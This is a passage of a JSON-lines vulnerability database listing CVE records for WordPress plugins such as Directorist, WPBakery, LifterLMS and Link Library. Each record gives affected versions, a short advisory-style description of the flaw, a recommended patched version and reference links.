{"CVE_ID":"CVE-2024-1322","slug":"directorist","versionImpact":"7.8.4","versionEndExcluding":"7.8.5","description":"The Directorist \u2013 WordPress Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'setup_wizard' function in all versions up to, and including, 7.8.4. This makes it possible for unauthenticated attackers to recreate default pages and enable or disable monetization and change map provider.","recommendation":"Update to version 7.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa26e958-4850-451b-88eb-d48fc0c7feb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa26e958-4850-451b-88eb-d48fc0c7feb7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/tags\\\/7.8.4\\\/includes\\\/classes\\\/class-setup-wizard.php#L300\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/tags\\\/7.8.4\\\/includes\\\/classes\\\/class-setup-wizard.php#L300\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fdirectorist%2Ftags%2F7.8.4&old=3034765&new_path=%2Fdirectorist%2Ftags%2F7.8.5&new=3034765&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fdirectorist%2Ftags%2F7.8.4&old=3034765&new_path=%2Fdirectorist%2Ftags%2F7.8.5&new=3034765&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8492","slug":"wordpress-popup","versionImpact":"7.8.4","versionEndExcluding":"7.8.5","description":"The Hustle  WordPress plugin through 7.8.5 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 7.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7437eba-8e91-4fcc-82a3-ff8908b36877\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7437eba-8e91-4fcc-82a3-ff8908b36877\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6448","slug":"mollie-payments-for-woocommerce","versionImpact":"7.7.0","versionEndExcluding":"7.8.0","description":"The Mollie Payments for WooCommerce plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 7.7.0. This is due to the error reporting being enabled by default in multiple plugin files. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.","recommendation":"Update to version 7.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c98026c-28a9-4c69-9f34-4c3bd4f75d85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c98026c-28a9-4c69-9f34-4c3bd4f75d85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mollie-payments-for-woocommerce\\\/tags\\\/7.5.5\\\/vendor\\\/mollie\\\/mollie-api-php\\\/examples\\\/initialize.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mollie-payments-for-woocommerce\\\/tags\\\/7.5.5\\\/vendor\\\/mollie\\\/mollie-api-php\\\/examples\\\/initialize.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3142176%40mollie-payments-for-woocommerce&new=3142176%40mollie-payments-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3142176%40mollie-payments-for-woocommerce&new=3142176%40mollie-payments-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-26913","slug":"ar-for-wordpress","versionImpact":"7.7","versionEndExcluding":"7.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webandprint AR For WordPress allows DOM-Based XSS. This issue affects AR For WordPress: from n\/a through 7.7.","recommendation":"Update to version 7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ar-for-wordpress\\\/vulnerability\\\/wordpress-ar-for-wordpress-plugin-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ar-for-wordpress\\\/vulnerability\\\/wordpress-ar-for-wordpress-plugin-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2889","slug":"link-library","versionImpact":"7.7.3","versionEndExcluding":"7.8","description":"The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Additional Parameters in all versions up to, and including, 7.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/link-library\\\/tags\\\/7.7.3\\\/link-library-admin.php#L7610\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/link-library\\\/tags\\\/7.7.3\\\/link-library-admin.php#L7610\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0881efbe-9b47-4b56-be2d-12258460b429?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0881efbe-9b47-4b56-be2d-12258460b429?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36670","slug":"nex-forms-express-wp-form-builder","versionEndExcluding":"7.8","description":"The NEX-Forms. plugin for WordPress is vulnerable to unauthorized disclosure and modification of data in versions up to, and including 7.7.1 due to missing capability checks on several AJAX actions. This makes it possible for authenticated attackers with subscriber level permissions and above to invoke these functions which can be used to perform actions like modify form submission records, deleting files, sending test emails, modifying plugin settings, and more.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2427162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2427162\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01940eeb-b4a6-450d-b646-84f415ca92c9\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01940eeb-b4a6-450d-b646-84f415ca92c9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5709","slug":"js_composer","versionImpact":"7.7","versionEndExcluding":"7.8","description":"The WPBakery Visual Composer plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.7 via the 'layout_name' parameter. This makes it possible for authenticated attackers, with Author-level access and above, and with post permissions granted by an Administrator, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fad30c8-fd8a-4cf2-a3aa-16a374231b87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fad30c8-fd8a-4cf2-a3aa-16a374231b87?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpbakery.com\\\/\",\"name\":\"https:\\\/\\\/wpbakery.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5708","slug":"js_composer","versionImpact":"7.7","versionEndExcluding":"7.8","description":"The WPBakery Visual Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link\u2019 parameter in all versions up to, and including, 7.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, and with post permissions granted by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23ff12f0-eb9d-4bb3-8db0-0e794c0f0594?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23ff12f0-eb9d-4bb3-8db0-0e794c0f0594?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpbakery.com\\\/\",\"name\":\"https:\\\/\\\/wpbakery.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4900","slug":"wp-seopress","versionImpact":"7.7.2","versionEndExcluding":"7.8","description":"The SEOPress  WordPress plugin before 7.8 does not validate and escape one of its Post settings, which could allow contributor and above role to perform Open redirect attacks against any user viewing a malicious post","recommendation":"Update to version 7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a56ad272-e2ed-4064-9b5d-114a834dd8b3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a56ad272-e2ed-4064-9b5d-114a834dd8b3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4899","slug":"wp-seopress","versionImpact":"7.7.2","versionEndExcluding":"7.8","description":"The SEOPress  WordPress plugin before 7.8 does not sanitise and escape some of its Post settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15346ae9-9a29-4968-a6a9-81d1116ac448\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15346ae9-9a29-4968-a6a9-81d1116ac448\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7349","slug":"lifterlms","versionImpact":"7.7.5","versionEndExcluding":"7.7.6","description":"The LifterLMS \u2013 WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to blind SQL Injection via the 'order' parameter in all versions up to, and including, 7.7.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 7.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a096506-b18e-419c-808b-6099baa628ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a096506-b18e-419c-808b-6099baa628ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139798\\\/lifterlms\\\/tags\\\/7.7.6\\\/includes\\\/abstracts\\\/abstract.llms.database.query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139798\\\/lifterlms\\\/tags\\\/7.7.6\\\/includes\\\/abstracts\\\/abstract.llms.database.query.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13404","slug":"link-library","versionImpact":"7.7.2","versionEndExcluding":"7.7.3","description":"The Link Library plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'searchll' parameter in all versions up to, and including, 7.7.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225694%40link-library&new=3225694%40link-library&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225694%40link-library&new=3225694%40link-library&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f01362dc-4f3d-4b77-b802-01b436287237?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f01362dc-4f3d-4b77-b802-01b436287237?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41798","slug":"directorist","versionEndExcluding":"7.7.2","description":"Improper Neutralization of Formula Elements in a CSV File vulnerability in wpWax Directorist \u2013 WordPress Business Directory Plugin with Classified Ads Listing.This issue affects Directorist \u2013 WordPress Business Directory Plugin with Classified Ads Listings: from n\/a through 7.7.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/directorist\\\/wordpress-directorist-plugin-7-7-0-csv-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/directorist\\\/wordpress-directorist-plugin-7-7-0-csv-injection?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1427","slug":"the-post-grid","versionImpact":"7.7.1","versionEndExcluding":"7.7.2","description":"The The Post Grid \u2013 Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the section title tag attribute in all versions up to, and including, 7.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc870ce5-1352-43f2-b80b-45065ceed750?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc870ce5-1352-43f2-b80b-45065ceed750?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-post-grid\\\/tags\\\/7.4.2\\\/app\\\/Helpers\\\/Fns.php#L1051\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-post-grid\\\/tags\\\/7.4.2\\\/app\\\/Helpers\\\/Fns.php#L1051\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080313\\\/#file347\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080313\\\/#file347\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7418","slug":"the-post-grid","versionImpact":"7.7.11","versionEndExcluding":"7.7.12","description":"The The Post Grid \u2013 Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.7.11 via the post_query_guten and post_query functions. This makes it possible for authenticated attackers, with contributor-level access and above, to extract information from posts that are not public (i.e. draft, future, etc..).","recommendation":"Update to version 7.7.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dddecb2e-9ad6-4e44-afce-5eba7da6322d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dddecb2e-9ad6-4e44-afce-5eba7da6322d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3142599%40the-post-grid&new=3142599%40the-post-grid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3142599%40the-post-grid&new=3142599%40the-post-grid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142599\\\/the-post-grid\\\/trunk\\\/app\\\/Controllers\\\/Blocks\\\/BlockBase.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142599\\\/the-post-grid\\\/trunk\\\/app\\\/Controllers\\\/Blocks\\\/BlockBase.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142599\\\/the-post-grid\\\/trunk\\\/app\\\/Widgets\\\/elementor\\\/rtTPGElementorQuery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142599\\\/the-post-grid\\\/trunk\\\/app\\\/Widgets\\\/elementor\\\/rtTPGElementorQuery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3936","slug":"the-post-grid","versionImpact":"7.6.1","versionEndExcluding":"7.7.0","description":"The The Post Grid \u2013 Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtTPGSaveSettings function in all versions up to, and including, 7.6.1. This makes it possible for authenticated attackers, with subscriber access or higher, to change the plugin's settings and invoke other functions hooked by AJAX actions.","recommendation":"Update to version 7.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4ef2ced-3c82-4379-8b14-1cf11482fd35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4ef2ced-3c82-4379-8b14-1cf11482fd35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-post-grid\\\/trunk\\\/app\\\/Controllers\\\/AjaxController.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-post-grid\\\/trunk\\\/app\\\/Controllers\\\/AjaxController.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078599%40the-post-grid%2Ftrunk&old=3061874%40the-post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078599%40the-post-grid%2Ftrunk&old=3061874%40the-post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5265","slug":"js_composer","versionImpact":"7.6","versionEndExcluding":"7.7","description":"The WPBakery Visual Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link attribute within the vc_single_image shortcode in all versions up to, and including, 7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a5114e-5c5f-4003-8bb3-77243ffbac1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a5114e-5c5f-4003-8bb3-77243ffbac1a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4281","slug":"link-library","versionImpact":"7.6.11","versionEndExcluding":"7.7","description":"The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'link-library' shortcode in all versions up to, and including, 7.6.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c9c4b9-6905-4d8a-bc55-5cd6f6201d25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c9c4b9-6905-4d8a-bc55-5cd6f6201d25?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081532\\\/link-library\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081532\\\/link-library\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2546","slug":"all-in-one-wp-migration","versionEndExcluding":"7.63","description":"The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f84920e4-a1fe-47cf-9ba5-731989c70f58\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f84920e4-a1fe-47cf-9ba5-731989c70f58\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47683","slug":"miniorange-login-openid","versionImpact":"7.6.6","versionEndExcluding":"7.6.7","description":"Improper Privilege Management vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) allows Privilege Escalation.This issue affects WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn): from n\/a through 7.6.6.","recommendation":"Update to version 7.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-social-login-social-sharing-by-miniorange-plugin-7-6-6-authenticated-privilege-escalation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-social-login-social-sharing-by-miniorange-plugin-7-6-6-authenticated-privilege-escalation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13319","slug":"themify-builder","versionImpact":"7.6.5","versionEndExcluding":"7.6.6","description":"The Themify Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.6.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224684\\\/themify-builder\\\/trunk\\\/themify\\\/themify-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224684\\\/themify-builder\\\/trunk\\\/themify\\\/themify-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ac1e37-4e31-4dce-a2d6-07a4299995c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ac1e37-4e31-4dce-a2d6-07a4299995c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3998","slug":"wpdiscuz","versionImpact":"7.6.3","versionEndExcluding":"7.6.4","description":"The wpDiscuz plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the userRate function in versions up to, and including, 7.6.3. This makes it possible for unauthenticated attackers to increase or decrease the rating of a post.","recommendation":"Update to version 7.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/utils\\\/class.WpdiscuzHelperAjax.php#L886\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/utils\\\/class.WpdiscuzHelperAjax.php#L886\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d09bdab-ffab-44cc-bba2-821b21a8e343?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d09bdab-ffab-44cc-bba2-821b21a8e343?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3869","slug":"wpdiscuz","versionImpact":"7.6.3","versionEndExcluding":"7.6.4","description":"The wpDiscuz plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the voteOnComment function in versions up to, and including, 7.6.3. This makes it possible for unauthenticated attackers to increase or decrease the rating of a comment.","recommendation":"Update to version 7.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b30ac1b0-eae2-4194-bf8e-ae73b4236965?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b30ac1b0-eae2-4194-bf8e-ae73b4236965?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/utils\\\/class.WpdiscuzHelperAjax.php#L681\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/utils\\\/class.WpdiscuzHelperAjax.php#L681\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4743","slug":"lifterlms","versionImpact":"7.6.2","versionEndExcluding":"7.6.3","description":"The LifterLMS \u2013 WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to SQL Injection via the orderBy attribute of the lifterlms_favorites shortcode in all versions up to, and including, 7.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 7.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3a1e3c-eba0-4ef4-bcb8-929799bb56a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3a1e3c-eba0-4ef4-bcb8-929799bb56a8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3095706%40lifterlms%2Ftrunk&old=3094820%40lifterlms%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3095706%40lifterlms%2Ftrunk&old=3094820%40lifterlms%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9385","slug":"themify-builder","versionImpact":"7.6.2","versionEndExcluding":"7.6.3","description":"The Themify Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.6.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.6.3, or a newer patched 